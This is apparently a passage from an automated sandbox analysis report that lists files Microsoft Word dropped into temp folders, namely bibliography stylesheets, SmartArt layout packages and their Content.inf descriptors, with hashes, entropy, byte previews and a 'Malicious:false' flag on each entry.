                                    Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                    C:\Users\user\AppData\Local\Temp\TCD9AF7.tmp\APASixthEditionOfficeOnline.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):333258
                                    Entropy (8bit):4.654450340871081
                                    Encrypted:false
                                    SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                    MD5:5632C4A81D2193986ACD29EADF1A2177
                                    SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                    SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                    SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                    C:\Users\user\AppData\Local\Temp\TCD9AF7.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):328
                                    Entropy (8bit):3.541819892045459
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                    MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                    SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                    SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                    SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9B55.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):332
                                    Entropy (8bit):3.547857457374301
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                    MD5:4EC6724CBBA516CF202A6BD17226D02C
                                    SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                    SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                    SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9B55.tmp\harvardanglia2008officeonline.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):284415
                                    Entropy (8bit):5.00549404077789
                                    Encrypted:false
                                    SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                    MD5:33A829B4893044E1851725F4DAF20271
                                    SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                    SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                    SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                    C:\Users\user\AppData\Local\Temp\TCD9B66.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):254
                                    Entropy (8bit):3.4845992218379616
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                    MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                    SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                    SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                    SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9B66.tmp\HexagonRadial.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):6024
                                    Entropy (8bit):7.886254023824049
                                    Encrypted:false
                                    SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                    MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                    SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                    SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                    SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                    C:\Users\user\AppData\Local\Temp\TCD9B67.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):260
                                    Entropy (8bit):3.494357416502254
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                    MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                    SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                    SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                    SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9B67.tmp\ThemePictureGrid.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):6193
                                    Entropy (8bit):7.855499268199703
                                    Encrypted:false
                                    SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                    MD5:031C246FFE0E2B623BBBD231E414E0D2
                                    SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                    SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                    SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                    Malicious:false
                                    Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                    C:\Users\user\AppData\Local\Temp\TCD9B78.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):258
                                    Entropy (8bit):3.4692172273306268
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                    MD5:C1B36A0547FB75445957A619201143AC
                                    SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                    SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                    SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9B78.tmp\pictureorgchart.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Microsoft OOXML
                                    Category:dropped
                                    Size (bytes):7370
                                    Entropy (8bit):7.9204386289679745
                                    Encrypted:false
                                    SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                    MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                    SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                    SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                    SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                    Malicious:false
                                    Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                    C:\Users\user\AppData\Local\Temp\TCD9B79.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):314
                                    Entropy (8bit):3.5230842510951934
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                    MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                    SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                    SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                    SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                    C:\Users\user\AppData\Local\Temp\TCD9B79.tmp\ieee2006officeonline.xsl

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):294178
                                    Entropy (8bit):4.977758311135714
                                    Encrypted:false
                                    SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                    MD5:0C9731C90DD24ED5CA6AE283741078D0
                                    SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                    SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                    SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                    C:\Users\user\AppData\Local\Temp\TCD9C1A.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):242
                                    Entropy (8bit):3.4938093034530917
                                    Encrypted:false
                                    SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                    MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                    SHA1:BA15D036D522978409846EA682A1D7778381266F
                                    SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                    SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C1A.tmp\TabList.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):4888
                                    Entropy (8bit):7.8636569313247335
                                    Encrypted:false
                                    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                    Malicious:false
                                    Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                    C:\Users\user\AppData\Local\Temp\TCD9C2A.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):256
                                    Entropy (8bit):3.4842773155694724
                                    Encrypted:false
                                    SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                    MD5:923D406B2170497AD4832F0AD3403168
                                    SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                    SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                    SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                    Malicious:false
                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                    C:\Users\user\AppData\Local\Temp\TCD9C2A.tmp\ConvergingText.glox

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):11380
                                    Entropy (8bit):7.891971054886943
                                    Encrypted:false
                                    SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                    MD5:C9F9364C659E2F0C626AC0D0BB519062
                                    SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                    SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                    SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                    Malicious:false
                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                    C:\Users\user\AppData\Local\Temp\TCD9C2B.tmp\Content.inf

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):238
                                    Entropy (8bit):3.472155835869843
                                    Encrypted:false
